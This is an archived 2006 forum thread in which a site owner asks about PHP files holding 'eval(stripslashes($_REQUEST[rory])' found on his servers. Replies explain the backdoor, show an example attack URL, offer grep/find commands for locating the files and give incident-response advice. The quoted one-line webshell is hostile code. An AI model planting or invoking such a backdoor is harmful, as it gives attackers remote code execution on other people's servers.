Comments on: Web site hack?

Question: Web site hack?

jca — Tue, 28 Feb 2006 10:06:43 -0800

Web site hacking attempts courtesy of "rory".

So I've seen several unknown files littered on the server side web site directories, usually a php file with code that includes:

eval(stripslashes($_REQUEST[rory])

or some variation of "rory was here". I assume these are hacking/backdoor attempts on the server, but I can't find specific information or links about that specific type of code.

Does anyone have any information about this "hack"?

I've tried using grep to check other files on the server, but it doesn't seem to be returning any results for "rory" (which isn't correct). What would be the proper grep command to search all the files for this code? What unix command would I use to check the server to see any changed files or owned by www, etc.?

By: IshmaelGraves

IshmaelGraves — Tue, 28 Feb 2006 10:16:03 -0800

From your document root:

grep -r rory *

By: Kickstart70

Kickstart70 — Tue, 28 Feb 2006 10:22:34 -0800

or, for easier parsing:



Files:

find / -type f -name \*rory\*



Directories:

find / -type d -name \*rory\*

By: jca

jca — Tue, 28 Feb 2006 10:23:42 -0800

I'd be curious if others could run the "grep -r rory *" on their web server(s) and tell us if they see any results.

By: uncle harold

uncle harold — Tue, 28 Feb 2006 10:23:50 -0800

Does anyone have any information about this "hack"?

I'm not sure if you mean "about the occurrence this mode of attack", or if you mean "what does this code do".

Just in case: It will execute PHP code send to the server in a string set to the request variable "rory" (using POST or GET).

It can do anything to your server you could do yourself using PHP. Remove ASAP.

By: uncle harold

uncle harold — Tue, 28 Feb 2006 10:24:41 -0800

But the far more interesting thing is to find out how it got there.

By: Kickstart70

Kickstart70 — Tue, 28 Feb 2006 10:26:42 -0800

Doh...I didn't give a decent answer...ignore the above.



Files:

find / -type f | xargs grep rory



Recursive directories:

find / -type d | xargs grep -r rory

Is it just me or does the PRE tags include lots of junk space?

By: jca

jca — Tue, 28 Feb 2006 10:31:06 -0800

It will execute PHP code send to the server in a string set to the request variable "rory" (using POST or GET).

How would you show what the variable "rory" is currently set to?

But the far more interesting thing is to find out how it got there.

That's what I'd like to know, hence the question. Can't find any links that reference useful information about that code. I assume it got there through a vulnerability in some other script, such as phpadsnew or...?

By: uncle harold

uncle harold — Tue, 28 Feb 2006 10:38:21 -0800

The request variables are set each time a request to the page is made, so while you can display its content, that will be worthless in this case - because it will depend on what you (or rather, the attacker) sends in the request.

The attacker would do something like http://www.jcaserver.org/hack.php?rory=somephpcommandhere

By: jca

jca — Tue, 28 Feb 2006 10:44:16 -0800

Well, I've seen it on several unrelated sites (different hosts, servers, software used, etc.), so I'm willing to bet if others run that previous grep they might see some results. :(

By: trevyn

trevyn — Tue, 28 Feb 2006 10:51:36 -0800

Mac OS X Server, no rories here.

By: poppo

poppo — Tue, 28 Feb 2006 10:54:22 -0800

you didn't give a lot of information about your webserver, which might be helpful...what OS, what webserver. these might help in the suggestions we could give

in any case, one thing is to start checking logs. depending on how your webserver is configured it might be logging all the gets and posts. start looking for requests that you aren't normal for your webapp.

you might try to use a tool like chkrootkit to determine if the system if completely rooted at the OS level, or if they've just taken advantage of a weakness in a webapp you were using.

the unknown files you've found: what are their dates and times and can you correlate this with any other dates and times either in the logs on the webserver (not only web logs but other system logs as well) or with the logs of your firewall and/or routers.

what are the names of the unknown files you found? that might help you determine what exact hack you are facing.

By: adamrice

adamrice — Tue, 28 Feb 2006 10:55:44 -0800

I made myself vulnerable to a similar attack once because I used php includes that were called in the form of URLs like mydomain.com/index.php?page=somepage. Apparently, people tricksier than me were able to substitute something special for "somepage" that allowed them to execute their own code and load up their own pages to my site.

Oops.

By: borkencode

borkencode — Tue, 28 Feb 2006 11:09:40 -0800

Not a single rory found here (but I just run my own blog).

I agree with uncle harold that the far more interesting story is how they got there.
You say you've seen them in several unrelated sites, do you run all these? Do you provide hosting?
Is there a common link between where you've seen them? eg Operating system, webserver, php version, software that runs the site, configuration of any of the above.

Simply removing them will NOT do any good if you don't know HOW they got there.

By: jca

jca — Tue, 28 Feb 2006 11:18:54 -0800

Well, that's why I posted the question -- trying to find if they're associated with a particular hack, vunerable software, etc. in order to figure out how they got there.

By: Kickstart70

Kickstart70 — Tue, 28 Feb 2006 11:20:01 -0800

Files on a webserver (Debian, running apache) that include 'rory'.

Binary file /usr/lib/bitchx/plugins/aim.so matches
/usr/src/linux-2.6.14/fs/super.c: * Drops an active reference to superblock, acquiring a temprory one if
/usr/src/linux-2.6.14/arch/arm/mach-iop3xx/iop321-irq.c: * Author: Rory Bolt
/usr/src/linux-2.6.14/arch/arm/mach-iop3xx/iop321-pci.c: * Author: Rory Bolt
/usr/src/linux-2.6.14/arch/arm/mach-iop3xx/iq80321-mm.c: * Author: Rory Bolt
/usr/src/linux-2.6.14/arch/arm/mach-iop3xx/iq31244-pci.c: * Author: Rory Bolt
/usr/src/linux-2.6.14/arch/arm/mach-iop3xx/iq31244-mm.c: * Author: Rory Bolt
/usr/src/linux-2.6.14/arch/arm/mach-iop3xx/iq80321-pci.c: * Author: Rory Bolt
/usr/src/linux-2.6.14/include/asm-arm/arch-iop3xx/iop321.h: * Author: Rory Bolt
/usr/src/linux-2.6.14/include/asm-arm/arch-iop3xx/iop321-irqs.h: * Author: Rory Bolt
/usr/share/vim/vim64/syntax/docbk.vim:" Add special emphasis on some regions. Thanks to Rory Hunter for these ideas.

By: jca

jca — Tue, 28 Feb 2006 11:20:38 -0800

(phpadsnew seems a likely candidate, but I'm assuming many php scripts would be vulnerable?)

By: yerfatma

yerfatma — Tue, 28 Feb 2006 11:32:06 -0800

Google query

By: poppo

poppo — Tue, 28 Feb 2006 11:37:08 -0800

first link in yerfatma's query is perfect, if jca has a postnuke forum.

By: jca

jca — Tue, 28 Feb 2006 11:37:53 -0800

I've seen that single postnuke forum mention (via Google), but it didn't shed any light on the problem.

By: jca

jca — Tue, 28 Feb 2006 11:38:24 -0800

(not running postnuke)

By: sailormouth

sailormouth — Tue, 28 Feb 2006 11:41:02 -0800

Open your raw log file that would have entries from the date the files from rory were created. Then search for "cmd" or "txt" (owned.txt, test.txt) or "cse" (usually cse.jpg).

By: jca

jca — Tue, 28 Feb 2006 11:46:57 -0800

no log files going back to the date of the hacked file(s).

phpBB seems vulnerable to a "friend" of rory. (I'm not running phpBB).

By: poppo

poppo — Tue, 28 Feb 2006 11:47:41 -0800

in that forum, it mentions that the exploitable part of it was the XMLRpc module. Perhaps this is used in another php based app on your webserver?

for example, it is also used in Wordpress, Drupal, PostNuke, Serendipity, phpAdsNew, phpWiki and many more.

By: poppo

poppo — Tue, 28 Feb 2006 11:53:23 -0800

a longer list from the sourceforge page for xmlrpc: PHPXMLRPC or derivative versions are used in many open source projects, including Ampache, Xaraya, Drupal (only up to releases 4.6.2 and 4.5.4), PostNuke, b2evolution, nucleus cms, phpmyfaq, phpPgAds, phpgroupware, egroupware, TikiWiki, Civicspace (old release only) and MailWatch for MailScanner.

By: poppo

poppo — Tue, 28 Feb 2006 11:54:46 -0800

or, just see if xmlrpc.php exists on your webserver

By: nomisxid

nomisxid — Tue, 28 Feb 2006 11:59:39 -0800

Kickstart, a single find command is all that is needed

find . -name \*.php -exec grep 'rory' {} \; -print

By: andrew cooke

andrew cooke — Tue, 28 Feb 2006 13:40:22 -0800

do you have xmlrpc.php anywhere?

By: Rhomboid

Rhomboid — Tue, 28 Feb 2006 17:15:14 -0800

Use xargs instead of -exec with find. It's much more efficient to run grep once with all the files on the command line rather than having to invoke grep once for each file.

By: camworld

camworld — Tue, 28 Feb 2006 18:56:26 -0800

My logs are always full of every kind of exploit/attack known to hackers, regardless of whether or not I am running the software they are trying to explot.

There are a lot of scum out there who have automated this process and let it run continuously, trying every exploit against every server they can find. When they get a hit (find a vulnerable server running insecure software) they then take control in whatever way they can and use your server for whatever means they want.

Twice last year my server was hacked because I was too lazy to keep awstats updated. Both times the hacker gained root-level acccess (because I was dumb and installed awsats from root) and installed software that then proceeded to try and exploit other servers. Both times I had to bring the server down, dump the databases and web files to a different server, re-install Debian and reconfigure everything. The first time the server was hacked it was done by some weird group of Brazilian hackers who were in a weird contest with other hackers to see hwo many servers they could hack in a period of time (weird, I know). They didn't install anything but a script that rewrote ever index.* page on the site with their hacked message.

I suck at being a sysadmin, but the few years I did run my own server I had to learn a lot. What I came away with is that you can never be truly secure unless you monitor the server constantly and keep on top of security patches.

So, seeing "eval(stripslashes($_REQUEST[rory])" in your logs really doesn't mean anything except that scum are running a known exploit against your server looking for unpatched software regardless of whether you are running that software or not.

By: ook

ook — Tue, 28 Feb 2006 20:27:24 -0800

camworld, these aren't in the logs, they're executable files stored inside the webspace.

How would you show what the variable "rory" is currently set to?

It's a back door; whoever put those files there could go to a url matching one of the files, include &rory=[any executable code] in the url, and that executable code would run on your system. Presumably to do something unpleasant.

By: ook

ook — Tue, 28 Feb 2006 20:31:16 -0800

To be more specific: these are not "hacking attempts" -- you have already been hacked, successfully, and your system is currently wide open to anyone who knows where those files are. Your first task is to delete those files.

As for how they got in in the first place, I don't know, but if I were you I would disable absolutely everything on the sever that I wasn't actively using, and make sure everything else is upgraded to the most current version. I'd also be backing up my files to a different box right now.

By: madman

madman — Tue, 28 Feb 2006 23:48:30 -0800

To be more specific: these are not "hacking attempts" -- you have already been hacked, successfully

Yep, I was surprised nobody seemed to think much of that.

If a file is already on your server, that means the person who put it there had access to the server. You have a bigger problem than you imagined. Yank off your Net connection and find out the cause first.